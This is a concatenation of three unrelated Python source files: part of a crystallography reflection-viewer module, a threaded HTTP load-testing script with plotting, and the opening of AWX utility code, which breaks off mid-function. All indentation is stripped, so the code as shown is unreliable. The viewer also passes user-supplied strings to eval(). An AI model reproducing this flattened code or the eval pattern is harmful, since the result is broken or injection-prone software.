self.mprint("".join(traceback.format_tb(e.__traceback__ )) + e.__repr__())
arrays = []
return ret
def LoadMillerArrays(self, marrays):
self.provided_miller_arrays = marrays
self.params.use_provided_miller_arrays = True
self.update_settings()
def SaveReflectionsFile(self, savefilename):
if self.loaded_file_name == savefilename:
self.mprint("Not overwriting currently loaded file. Choose a different name!")
return
self.mprint("Saving file...")
fileextension = os.path.splitext(savefilename)[1]
if fileextension == ".mtz":
mtz1 = self.viewer.proc_arrays[0].as_mtz_dataset(column_root_label= self.viewer.proc_arrays[0].info().labels[0])
for i,arr in enumerate(self.viewer.proc_arrays):
if i==0:
continue
mtz1.add_miller_array(arr, column_root_label=arr.info().labels[0] )
try: # python2 or 3
mtz1.mtz_object().write(savefilename)
except Exception as e:
mtz1.mtz_object().write(savefilename.encode("ascii"))
self.mprint("Miller array(s) saved to: " + savefilename)
elif fileextension == ".cif":
import iotbx.cif
mycif = None
fname = savefilename
fnames = []
def save2cif(filename, mycif):
with open(filename.encode("ascii"), "w") as f:
f.write("data_%s\n#\n" %os.path.splitext(os.path.basename(filename))[0])
print(mycif.cif_block, file= f)
for i,arr in enumerate(self.viewer.proc_arrays):
arrtype = None
colnames = ["_refln.%s" %e for e in arr.info().labels ]
colname= None
if self.has_indices_with_multiple_data(arr):
# if array contains data with more than one data point for the same hkl index iotbx.cif
# cannot add additional arrays to the cif block so save this array in a separate file
singlecif = iotbx.cif.miller_arrays_as_cif_block(arr, array_type = arrtype,
column_name=colname, column_names = colnames )
fname = os.path.splitext(savefilename)[0] + "_%d"%i + os.path.splitext(savefilename)[1]
save2cif(fname, singlecif)
fnames.append(fname)
continue
if not mycif:
mycif = iotbx.cif.miller_arrays_as_cif_block(arr, array_type = arrtype,
column_name=colname, column_names = colnames )
else:
mycif.add_miller_array(arr, column_name= colname, array_type= arrtype,
column_names = colnames)
if mycif:
save2cif(savefilename, mycif)
fnames.append(savefilename)
self.mprint("Miller array(s) saved to: " + ",\n".join(fnames))
if len(fnames) > 1:
self.mprint("Unmerged data put into separate files")
else:
self.mprint("Can only save file in MTZ or CIF format. Sorry!")
def has_indices_with_multiple_data(self, arr):
return len(set(list(arr.indices()))) < arr.size()
def tabulate_arrays(self, datalabels):
if len(self.origarrays) == 0: # if not an mtz file then split columns
# SupersetMillerArrays may not be necessary if file formats except for cif and mtz can't store multiple data columns
#self.viewer.SupersetMillerArrays()
self.origarrays["HKLs"] = self.viewer.proc_arrays[0].indices()
for id, arr in enumerate(self.viewer.proc_arrays): # enumerate so id can index array_infotpls below
if arr.is_complex_array():
ampls, phases = self.viewer.Complex2AmplitudesPhases(arr.data())
cmplxlst = [ "%.4f + %.4f * i"%(e.real, e.imag)
if not cmath.isnan(e) else display.nanval for e in arr.data() ]
self.origarrays[arr.info().label_string()] = cmplxlst
self.origarrays[arr.info().labels[0]] = list(ampls)
self.origarrays[arr.info().labels[-1]] = list(phases)
elif arr.is_hendrickson_lattman_array():
A,B,C,D = arr.data().as_abcd()
HLlst = [ "%.4f, %.4f, %.4f, %.4f"%(e[0], e[1], e[2], e[3]) for e in arr.data() ]
self.origarrays[arr.info().label_string()] = HLlst
self.origarrays[arr.info().labels[0]] = list(A)
self.origarrays[arr.info().labels[1]] = list(B)
self.origarrays[arr.info().labels[2]] = list(C)
self.origarrays[arr.info().labels[3]] = list(D)
elif arr.sigmas() is not None:
labels = arr.info().labels
# Labels could be something like ['I(+)', 'SIGI(+)', 'I(-)', 'SIGI(-)'].
# So group data labels and sigma labels separately, assuming that the sigma columns contain the three letters "sig"
datalabel = ",".join([ e for e in labels if "sig" not in e.lower()])
sigmalabel = ",".join([ e for e in labels if "sig" in e.lower()])
self.origarrays[datalabel] = list(arr.data())
self.origarrays[sigmalabel] = list(arr.sigmas())
elif arr.is_integer_array():
list_with_nans = [ e if not e==display.inanval else display.nanval for e in arr.data() ]
if self.viewer.array_infotpls[id][0] == 'FreeR_flag': # want True or False back
list_with_nans = [ 1==e if not cmath.isnan(e) else display.nanval for e in list_with_nans ]
self.origarrays[arr.info().label_string()] = list_with_nans
else:
self.origarrays[arr.info().label_string()] = list(arr.data())
indices = self.origarrays["HKLs"]
dres = self.procarrays[0].unit_cell().d( indices)
dreslst = [("d_res", roundoff(list(dres)),3)]
hkls = list(indices)
hkllst = [ ("H", [e[0] for e in hkls] ), ("K", [e[1] for e in hkls] ), ("L", [e[2] for e in hkls] )]
datalst = []
labellists = eval(datalabels)
for labels in labellists:
crystlbl = ""; wavelbl = ""; scalelbl =""
for i,label in enumerate(labels):
if "crystal_id" in label:
crystlbl = "," + label
if "wavelength_id" in label:
wavelbl = "," + label
if "scale_group_code" in label:
scalelbl = "," + label
for label in labels:
if "crystal_id" in label or "wavelength_id" in label or "scale_group_code" in label:
continue
fulllabel = label + crystlbl + wavelbl + scalelbl
datalst.append( (label, list(self.origarrays[fulllabel])))
self.idx_data = hkllst + dreslst + datalst
self.mprint("Sending table data...", verbose=0)
mydict = { "tabulate_miller_array": self.idx_data }
self.params.tabulate_miller_array_ids = "[]" # to allow reopening a closed window again
self.SendInfoToGUI(mydict)
def TabulateMillerArray(self, ids):
self.params.tabulate_miller_array_ids = str(ids)
self.update_settings()
def SetCameraType(self, camtype):
self.params.NGL.camera_type = camtype
self.update_settings()
def ExpandToP1(self, val, inbrowser=True):
self.params.viewer.expand_to_p1 = val
self.params.viewer.inbrowser = inbrowser
self.update_settings()
def ExpandAnomalous(self, val, inbrowser=True):
self.params.viewer.expand_anomalous = val
self.params.viewer.inbrowser = inbrowser
self.update_settings()
def ShowOnlyMissing(self, val):
self.params.viewer.show_only_missing = val
self.update_settings()
def ShowMissing(self, val):
self.params.viewer.show_missing = val
self.update_settings()
def ShowDataOverSigma(self, val):
self.params.viewer.show_data_over_sigma = val
self.update_settings()
def ShowSystematicAbsences(self, val):
self.params.viewer.show_systematic_absences = val
self.update_settings()
def ShowSlice(self, val, axis="h", index=0):
axisstr = axis.lower()
self.params.viewer.slice_mode = val
self.params.viewer.slice_axis = axisstr
self.params.viewer.slice_index = index
self.update_settings()
def set_scene_bin_thresholds(self, strbinvals = "", binner_idx = 0, nbins = 6):
nuniquevalues = -1
if not strbinvals:
binvals, nuniquevalues = self.viewer.calc_bin_thresholds(binner_idx, nbins)
else:
nan = float("nan")
binvals = eval(strbinvals)
if binvals and binner_idx == 0:
binvals = list( 1.0/flex.double(binvals) )
self.viewer.UpdateBinValues(binner_idx, binvals, nuniquevalues)
def SetSceneNbins(self, nbins, binner_idx = 0):
self.params.nbins = nbins
self.params.binner_idx = binner_idx
self.params.NGL.bin_opacities = str([ (1.0, e) for e in range(nbins) ])
self.update_settings()
def GetNumberingOfBinners(self):
return [ (i,e) for i,e in enumerate(self.viewer.bin_labels_type_idxs) ]
def SetSceneBinThresholds(self, binvals=[]):
self.params.scene_bin_thresholds = str(binvals)
self.params.nbins = len(binvals)
self.update_settings()
def SetOpacities(self, bin_opacities):
self.params.NGL.bin_opacities = str(bin_opacities)
self.update_settings()
def SetToolTipOpacity(self, val):
self.params.NGL.tooltip_alpha = val
self.update_settings()
def SetShowToolTips(self, val):
self.params.NGL.show_tooltips = val
self.update_settings()
def set_scene(self, scene_id):
self.viewer.binvals = []
if scene_id is None:
return False
self.viewer.colour_scene_id = scene_id
self.viewer.radii_scene_id = scene_id
self.viewer.set_miller_array(scene_id)
if (self.viewer.miller_array is None):
raise Sorry("No data loaded!")
self.mprint( "Miller array %s runs from hkls: %s to %s" \
%(self.viewer.miller_array.info().label_string(), self.viewer.miller_array.index_span().min(),
self.viewer.miller_array.index_span().max() ) )
self.mprint("Spacegroup: %s" %self.viewer.miller_array.space_group().info().symbol_and_number())
self.update_space_group_choices()
return True
def SetScene(self, scene_id):
self.params.viewer.scene_id = scene_id
self.update_settings()
def SetMergeData(self, val):
self.params.merge_data = val
self.update_settings()
def SetColourScene(self, colourcol):
self.params.viewer.colour_scene_id = colourcol
self.update_settings()
def SetRadiusScene(self, radiuscol):
self.params.viewer.radii_scene_id = radiuscol
self.update_settings()
def SetRadiiScale(self, scale=1.0, nth_power_scale = -1.0):
"""
Scale radii. Decrease the contrast between large and small radii with nth_power_scale < 1.0
If nth_power_scale=0.0 then all radii will have the same size regardless of data values.
If nth_power_scale < 0.0 an automatic power will be computed ensuring the smallest radius
is 0.1 times the maximum radius
"""
self.params.viewer.scale = scale
self.params.viewer.nth_power_scale_radii = nth_power_scale
self.update_settings()
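# Illustrative calls (hypothetical HKLViewFrame instance named `myHKLview`):
#   myHKLview.SetRadiiScale(scale=0.5, nth_power_scale=0.35)   # smaller spheres, compressed size range
#   myHKLview.SetRadiiScale(scale=1.0, nth_power_scale=-1.0)   # automatic power, as described above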
def SetColourRadiusToSigmas(self, val):
self.params.viewer.sigma_color_radius = val
self.update_settings()
def SetColourScheme(self, color_scheme, color_powscale=1.0):
self.params.viewer.color_scheme = color_scheme
self.params.viewer.color_powscale = color_powscale
self.update_settings()
def SetShapePrimitive(self, val):
self.params.shape_primitive = val
self.update_settings()
def set_shape_primitive(self, val):
if val == "points":
self.viewer.primitivetype = "PointBuffer"
else:
self.viewer.primitivetype = "sphereBuffer"
def SetAction(self, val):
self.params.action = val
self.update_settings()
def set_action(self, val):
if val == "reset_view":
self.viewer.SetAutoView()
if val == "is_terminating":
self.__exit__()
return False
return True
def SetFontSize(self, val):
self.params.NGL.fontsize = val
self.viewer.SetFontSize(val)
def list_vectors(self):
self.viewer.all_vectors = self.viewer.rotation_operators[:]
if self.tncsvec is not None:
uc = self.viewer.miller_array.unit_cell()
# TNCS vector is specified in realspace fractional coordinates. Convert it to cartesian
cartvec = list( self.tncsvec * matrix.sqr(uc.orthogonalization_matrix()) )
ln = len(self.viewer.all_vectors)
self.viewer.all_vectors.append( (ln, "TNCS", 0, cartvec, "", "", str(roundoff(self.tncsvec, 5)) ) )
self.viewer.all_vectors = self.viewer.all_vectors + self.uservectors
for (opnr, label, order, cartvec, hkl_op, hkl, abc) in self.viewer.all_vectors:
# avoid onMessage-DrawVector in HKLJavaScripts.js misinterpreting the commas in strings like "-x,z+y,-y"
name = label + hkl_op.replace(",", "_")
self.viewer.RemovePrimitives(name)
self.SendInfoToGUI( { "all_vectors": self.viewer.all_vectors } )
return self.viewer.all_vectors
def add_user_vector(self):
uc = self.viewer.miller_array.unit_cell()
ln = len(self.viewer.all_vectors)
label = self.params.viewer.user_label
order = 0
try:
hklvec = ""
abcvec = ""
hklop = ""
unwantedchars = " |(|)|[|]|{|}"
# individual characters separated by | substituted with a "" using re.sub()
if self.params.viewer.add_user_vector_hkl not in [None, "", "()"]:
hklvec = eval(re.sub(unwantedchars, "", self.params.viewer.add_user_vector_hkl))
# convert into cartesian space
cartvec = list( self.viewer.scene.renderscale*(hklvec * matrix.sqr(uc.fractionalization_matrix()).transpose()) )
elif self.params.viewer.add_user_vector_abc not in [None, "", "()"]:
abcvec = eval(re.sub(unwantedchars, "", self.params.viewer.add_user_vector_abc))
# convert into cartesian space
cartvec = list(abcvec * matrix.sqr(uc.orthogonalization_matrix()))
elif self.params.viewer.add_user_vector_hkl_op not in [None, ""]:
hklop = re.sub(unwantedchars, "", self.params.viewer.add_user_vector_hkl_op)
rt = sgtbx.rt_mx(symbol=hklop, r_den=12, t_den=144)
self.viewer.symops.append( rt ) #
(cartvec, a, label, order) = self.viewer.GetVectorAndAngleFromRotationMx( rt.r() )
if label:
label = "%s-fold_%s" %(str(int(roundoff(2*math.pi/a, 0))), self.params.viewer.user_label)
self.mprint("Rotation axis, %s, added" %label)
if label =="" or order==0:
self.mprint("Cannot compute a rotation axis from %s" %self.params.viewer.add_user_vector_hkl_op)
return
if self.params.viewer.add_user_vector_hkl in [None, "", "()"] \
and self.params.viewer.add_user_vector_abc in [None, "", "()"] \
and self.params.viewer.add_user_vector_hkl_op in [None, ""]:
self.mprint("No vector was specified")
self.uservectors.append( (ln, label, order, cartvec, hklop, str(hklvec), str(abcvec) ))
self.list_vectors()
except Exception as e:
raise Sorry( str(e))
self.params.viewer.add_user_vector_hkl_op = ""
self.params.viewer.add_user_vector_hkl = ""
self.params.viewer.add_user_vector_abc = ""
def AddUserVector(self, hkl_op="", abc="", hkl="", label=""):
"""
A vector can be specified as a rotation operator, say "-h-k,k,-l" subject to space group constraints,
as a fractional vector in real space, or as a fractional vector in reciprocal space. If
specified as a rotation operator, the derived vector is the implicit rotation axis.
"""
self.params.viewer.user_label = label
self.params.viewer.add_user_vector_hkl_op = str(hkl_op)
self.params.viewer.add_user_vector_abc = str(abc)
self.params.viewer.add_user_vector_hkl = str(hkl)
self.update_settings()
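# Illustrative sketch (not part of the original module) of the three ways a user
# vector can be specified through AddUserVector(); the values and labels below are
# made-up examples only.
#
#   myHKLview = HKLViewFrame()
#   myHKLview.AddUserVector(hkl="(1,0,0)", label="a*")         # reciprocal space fractional vector
#   myHKLview.AddUserVector(abc="(0,0,1)", label="c_axis")     # real space fractional vector
#   myHKLview.AddUserVector(hkl_op="-h-k,k,-l", label="twin")  # rotation operator; the implicit
#                                                              # rotation axis becomes the vector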
def ShowRotationAxes(self, val):
self.params.viewer.show_symmetry_rotation_axes = val
self.update_settings()
def ShowVector(self, i, val=True):
self.params.viewer.show_vector = str([i, val])
self.update_settings()
def ShowUnitCell(self, val):
self.params.show_real_space_unit_cell = val
self.update_settings()
def ShowReciprocalUnitCell(self, val):
self.params.show_reciprocal_unit_cell = val
self.update_settings()
def SetClipPlane(self, use=True, hkldist=0.0, clipwidth=2.0):
if use:
self.params.clip_plane.hkldist = hkldist
self.params.clip_plane.clipwidth = clipwidth
self.params.slice_mode = False
self.params.inbrowser = True
else:
self.params.clip_plane.clipwidth = None
self.update_settings()
def SinglePlaneOfReflections(self, use=True, axis="h", slice_index=0 ):
if use:
self.params.viewer.slice_axis = axis
self.params.viewer.is_parallel = False
self.params.viewer.slice_mode = True
self.params.viewer.inbrowser = False
self.params.viewer.fixorientation = "reflection_slice"
self.params.viewer.slice_index = slice_index
else:
self.params.viewer.slice_mode = False
self.params.viewer.inbrowser = True
self.params.viewer.fixorientation = "None"
self.update_settings()
def OrientVector(self, vecnr, is_parallel, val=True):
self.params.viewer.fixorientation = "None"
if val:
self.params.viewer.is_parallel = is_parallel
self.params.viewer.fixorientation = "vector"
self.params.viewer.show_vector = '[%d, True]' %vecnr
self.update_settings()
def AnimateRotateAroundVector(self, vecnr, speed):
self.params.clip_plane.animate_rotation_around_vector = str([vecnr, speed])
self.update_settings()
def RotateAroundVector(self, vecnr, dgr):
self.params.clip_plane.angle_around_vector = str([vecnr, dgr])
self.update_settings()
def ShowHKL(self, hkl):
self.params.viewer.show_hkl = str(hkl)
self.update_settings()
def SetMouseSpeed(self, trackspeed):
self.params.NGL.mouse_sensitivity = trackspeed
self.update_settings()
def GetMouseSpeed(self):
self.viewer.GetMouseSpeed()
return self.params.NGL.mouse_sensitivity
def GetSpaceGroupChoices(self):
"""
return array of strings with available subgroups of the space group
"""
if (self.viewer.miller_array is None) :
self.mprint( NOREFLDATA)
if self.spacegroup_choices:
return [e.symbol_and_number() for e in self.spacegroup_choices]
return []
def SaveImageName(self, fname):
self.viewer.MakeImage(fname)
def SendCurrentPhilValues(self):
philstrvalsdict = {}
for e in self.currentphil.all_definitions():
philstrvalsdict[e.path] = e.object.extract()
mydict = { "current_phil_strings": philstrvalsdict }
self.SendInfoToGUI(mydict)
if self.viewer.params.viewer.scene_id is not None:
self.SendInfoToGUI({ "used_nth_power_scale_radii": self.viewer.HKLscene_from_dict().nth_power_scale_radii })
def GetHtmlURL(self):
return self.viewer.url
def GetHtmlstring(self):
return self.viewer.htmlstr
def GetArrayInfotpls(self):
"""
return array of tuples with information on each miller array
"""
return self.viewer.array_infotpls
def GetSceneDataLabels(self):
return [ e[3][0] for e in self.viewer.hkl_scenes_infos ]
def GetHklScenesInfos(self):
"""
return array of strings with information on each processed miller array,
which may have been expanded with anomalous reflections or truncated to non-anomalous reflections
so as to match the currently selected miller array
"""
return self.viewer.hkl_scenes_infos
def GetBinInfo(self):
"""
return an array with the number of HKLs in, and the boundaries of, the bins the current miller array data has been sorted into.
Useful when deciding which bin of reflections to make transparent
"""
return self.viewer.binstrs
def SendInfoToGUI(self, infodict, binary=True):
if self.guiSocketPort:
m = str(infodict).encode("utf-8")
if not binary:
self.guisocket.send( m )
else:
if type(m) is not bytes:
m = bytes(m)
bindict = zlib.compress( m )
self.guisocket.send( bindict )
masterphilstr = """
openfilename = None
.type = path
use_provided_miller_arrays = False
.type = bool
savefilename = None
.type = path
save_image_name = None
.type = path
merge_data = False
.type = bool
miller_array_operations = ''
.type = str
spacegroup_choice = 0
.type = int
using_space_subgroup = False
.type = bool
mouse_moved = False
.type = bool
real_space_unit_cell_scale_fraction = None
.type = float
reciprocal_unit_cell_scale_fraction = None
.type = float
clip_plane {
angle_around_vector = \"[0,0]\"
.type = str
animate_rotation_around_vector = \"[0,0]\"
.type = str
hkldist = 0.0
.type = float
clipwidth = None
.type = float
fractional_vector = reciprocal *realspace
.type = choice
bequiet = False
.type = bool
}
scene_bin_thresholds = ''
.type = str
binner_idx = 0
.type = int
nbins = 1
.type = int(value_min=1, value_max=40)
shape_primitive = *'spheres' 'points'
.type = choice
viewer {
scene_id = None
.type = int
ncolourlabels = 6
.type = int
show_symmetry_rotation_axes = False
.type = bool
show_vector = ''
.type = str
add_user_vector_hkl_op = ""
.type = str
add_user_vector_abc = ""
.type = str
add_user_vector_hkl = ""
.type = str
user_label = ""
.type = str
show_hkl = ""
.type = str
is_parallel = False
.type = bool
fixorientation = vector reflection_slice *None
.type = choice
angle_around_XHKL_vector = 0.0
.type = float
angle_around_YHKL_vector = 0.0
.type = float
angle_around_ZHKL_vector = 0.0
.type = float
%s
}
NGL {
%s
}
action = *is_running is_terminating reset_view
.type = choice
tabulate_miller_array_ids = "[]"
.type = str
""" %(display.philstr, view_3d.ngl_philstr)
def run():
"""
utility function for passing keyword arguments more directly to HKLViewFrame()
"""
#time.sleep(15)
# dirty hack for parsing a browser file path containing spaces when not using the default browser
args = sys.argv[1:]
sargs = " ".join(args)
qchar = "'"
if sargs.find("'") > -1:
quote1 = sargs.find(qchar)
if sargs[ quote1 + 1:].find(qchar) < 0:
raise Sorry("Missing quote in arguments")
quote2 = sargs[ quote1 + 1:].find(qchar) + quote1 + 1
space1 = sargs[ :quote1].rfind(" ")
arg = sargs[space1 +1: quote2 +1]
sargs2 = sargs.replace(arg,"")
args = sargs2.split(" ")
arg = arg.replace("'","")
arg = arg.replace('"',"")
arg = arg.replace('\\', '/') # the webbrowser module wants browser paths with unix forward slashes
args.append(arg)
kwargs = dict(arg.split('=') for arg in args if '=' in arg)
#check if any argument is a filename
for arg in args:
# if so add it as a keyword argument
if os.path.isfile(arg) and '=' not in arg:
kwargs['hklin'] = arg
myHKLview = HKLViewFrame(**kwargs)
return myHKLview
if __name__ == '__main__':
run()
|
load.py
|
import requests
import difflib
import numpy as np
import logging
import collections
import sys
import os
import statistics
import uuid
import matplotlib.pyplot as plt
import time
from util import get_request, get_data_size
from threading import Thread
import time
workerData = collections.namedtuple('workerData',['totalTime', 'numReqs', 'numErrors'])
compounded = collections.namedtuple('compounded',['numWorkers', 'totalReqs', 'avgWorkerTime', 'totalErrors'])
class Load(object):
def __init__(self, baseClients, baseRequests, iterations, proxyDict, urls):
self.baseClients = baseClients
self.baseRequests = baseRequests
self.iterations = iterations
self.proxyDict = proxyDict
self.urls = urls
self.workers = []
self.clientPoints = []
self.reqPoints = []
self.waitTime = 3
def run(self):
for url in self.urls:
kbs = int(get_data_size(url) / 1000)
logging.info('Iterating on num clients, fixed reqs per client'.upper())
fig = plt.figure()
dps = self.run_iterations(url, True)
title = 'GET: {}\nData Size: {} kbs; Fixed at {} Requests Per Client'.format(url, kbs, self.baseRequests)
self.generate_plot(title, dps, iterClients=True)
fig.savefig('{}.png'.format(uuid.uuid4()), dpi=300)
logging.info('Iterating on reqs/client'.upper())
fig = plt.figure()
dps = self.run_iterations(url, False)
title = 'GET: {}\nData Size: {} kbs; Fixed at {} Clients'.format(url, kbs, self.baseClients)
self.generate_plot(title, dps, iterReqs=True)
fig.savefig('{}.png'.format(uuid.uuid4()), dpi=300)
logging.info('Iterating on Fixed Requests'.upper())
fixedReqs = self.baseRequests * self.baseClients * self.iterations
fig = plt.figure()
dps = self.run_iterations(url, True, fixedReqs)
title = 'GET: {}\nData Size: {} kbs; Fixed at ~{} Requests'.format(url, kbs, fixedReqs)
self.generate_plot(title, dps, fixedReqs=True)
fig.savefig('{}.png'.format(uuid.uuid4()), dpi=300)
def run_iterations(self, url, iterateClients, fixedRequests=None):
data_points = []
numClients = self.baseClients
reqsPerClient = self.baseRequests if fixedRequests is None else fixedRequests // numClients  # integer division: request counts are passed to range()
for i in range(self.iterations):
self.run_concurrent(numClients, reqsPerClient, url)
time.sleep(self.waitTime) # To avoid 429s
# All workers done
data_points.append(self.get_data_point(numClients, reqsPerClient))
if iterateClients:
numClients += self.baseClients
if fixedRequests is not None:
reqsPerClient = fixedRequests // numClients
else:
reqsPerClient += self.baseRequests
return data_points
def generate_plot(self, title, data_points, iterClients=False, iterReqs=False, fixedReqs=False):
rpsCalc = lambda reqs, workers, avgTime: round(reqs / float(workers * avgTime), 2)
ys = [rpsCalc(p.totalReqs, p.numWorkers, p.avgWorkerTime) for p in data_points]
plt.ylabel('Requests / Second', fontsize=10)
if iterClients:
xs = [p.totalReqs for p in data_points]
plt.xlabel('Total Requests', fontsize=10)
bs = [p.numWorkers for p in data_points]
cs = [round(p.avgWorkerTime, 2) for p in data_points]
plt.plot(xs, ys, 'ro', label='# Clients, Client Perceived Time (s)')
elif iterReqs:
xs = [p.totalReqs for p in data_points]
plt.xlabel('Total Requests', fontsize=10)
bs = [p.totalReqs / p.numWorkers for p in data_points]
cs = [round(p.avgWorkerTime, 2) for p in data_points]
plt.plot(xs, ys, 'ro', label='Requests per Client, Client Perceived Time (s)')
elif fixedReqs:
xs = [p.numWorkers for p in data_points]
plt.xlabel('Number of Clients', fontsize=10)
bs = [p.totalReqs / p.numWorkers for p in data_points]
cs = [round(p.avgWorkerTime, 2) for p in data_points]
plt.plot(xs, ys, 'ro', label='Requests per Client, Client Perceived Time (s)')
plt.title(title, fontsize=10)
plt.legend(loc='upper right', fontsize=7)
for i in range(len(xs)):
plt.annotate(' {}, {}'.format(bs[i], cs[i]), (xs[i], ys[i]), fontsize=5)
def get_data_point(self, numClients, numReqs):
avgWorkerTime = statistics.mean([x.totalTime for x in self.workers])
totalErrors = int(sum([x.numErrors for x in self.workers]))
totalReqs = numReqs * numClients
self.workers = []
return compounded(numClients, totalReqs, avgWorkerTime, totalErrors)
def run_concurrent(self, clients, reqPerClient, url):
logging.info('Starting {} Clients, each with {} Requests to {}'.format(clients, reqPerClient, url))
threads = []
for i in range(clients):
t = Thread(target=self.worker, args=(reqPerClient, url))
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def worker(self, nReqs, url):
errors = 0
start = time.time()
for i in range(nReqs):
try:
res = get_request(url, self.proxyDict)
except Exception as e:
errors += 1
elapsed = time.time() - start
self.workers.append(workerData(elapsed, nReqs, errors))
|
common.py
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from datetime import timedelta
import json
import yaml
import logging
import os
import subprocess
import re
import stat
import urllib.parse
import threading
import contextlib
import tempfile
from functools import reduce, wraps
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.dateparse import parse_datetime
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db import connection
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import ForwardManyToOneDescriptor, ManyToManyDescriptor
from django.db.models.query import QuerySet
from django.db.models import Q
from django.db import connection as django_connection
from django.core.cache import cache as django_cache
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.utils.timezone import now
from django.apps import apps
# AWX
from awx.conf.license import get_license
logger = logging.getLogger('awx.main.utils')
__all__ = [
'get_object_or_400',
'camelcase_to_underscore',
'underscore_to_camelcase',
'memoize',
'memoize_delete',
'get_awx_http_client_headers',
'get_awx_version',
'update_scm_url',
'get_type_for_model',
'get_model_for_type',
'copy_model_by_class',
'copy_m2m_relationships',
'prefetch_page_capabilities',
'to_python_boolean',
'datetime_hook',
'ignore_inventory_computed_fields',
'ignore_inventory_group_removal',
'_inventory_updates',
'get_pk_from_dict',
'getattrd',
'getattr_dne',
'NoDefaultProvided',
'get_current_apps',
'set_current_apps',
'extract_ansible_vars',
'get_search_fields',
'model_to_dict',
'NullablePromptPseudoField',
'model_instance_diff',
'parse_yaml_or_json',
'RequireDebugTrueOrTest',
'has_model_field_prefetched',
'set_environ',
'IllegalArgumentError',
'get_custom_venv_choices',
'get_external_account',
'task_manager_bulk_reschedule',
'schedule_task_manager',
'classproperty',
'create_temporary_fifo',
'truncate_stdout',
'deepmerge',
'get_event_partition_epoch',
'cleanup_new_process',
]
def get_object_or_400(klass, *args, **kwargs):
"""
Return a single object from the given model or queryset based on the query
params, otherwise raise an exception that will result in a 400 response.
"""
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def datetime_hook(d):
new_d = {}
for key, value in d.items():
try:
new_d[key] = parse_datetime(value)
except TypeError:
new_d[key] = value
return new_d
def camelcase_to_underscore(s):
"""
Convert CamelCase names to lowercase_with_underscore.
"""
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
"""
Convert lowercase_with_underscore names to CamelCase.
"""
return ''.join(x.capitalize() or '_' for x in s.split('_'))
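# Illustrative examples (not from the original source), assuming a typical model name:
#
#   camelcase_to_underscore('JobTemplate')   # -> 'job_template'
#   underscore_to_camelcase('job_template')  # -> 'JobTemplate'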
class RequireDebugTrueOrTest(logging.Filter):
"""
Logging filter to output when in DEBUG mode or running tests.
"""
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
"""
Decorator to wrap a function and cache its result.
"""
if cache_key and track_function:
raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
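# Illustrative sketch (not part of the original module) of how @memoize is typically
# applied; the decorated function name below is made up.
#
#   @memoize(ttl=300)
#   def expensive_lookup(name):
#       ...  # result is cached in the Django cache under a slugified key for 300 seconds
#
#   # With track_function=True the cache key is derived from the function name alone,
#   # and a per-call dictionary keyed on the slugified args/kwargs is stored instead.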
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
@memoize(ttl=3600 * 24) # in practice, we only need this to load once at process startup time
def get_event_partition_epoch():
from django.db.migrations.recorder import MigrationRecorder
return MigrationRecorder.Migration.objects.filter(app='main', name='0144_event_partitions').first().applied
def get_awx_version():
"""
Return AWX version as reported by setuptools.
"""
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
def get_awx_http_client_headers():
license = get_license().get('license_type', 'UNLICENSED')
headers = {
'Content-Type': 'application/json',
'User-Agent': '{} {} ({})'.format('AWX' if license == 'open' else 'Red Hat Ansible Automation Platform', get_awx_version(), license),
}
return headers
def update_scm_url(scm_type, url, username=True, password=True, check_special_cases=True, scp_format=False):
"""
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
"""
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'svn', 'insights', 'archive'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
try:
parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
# if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
# if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
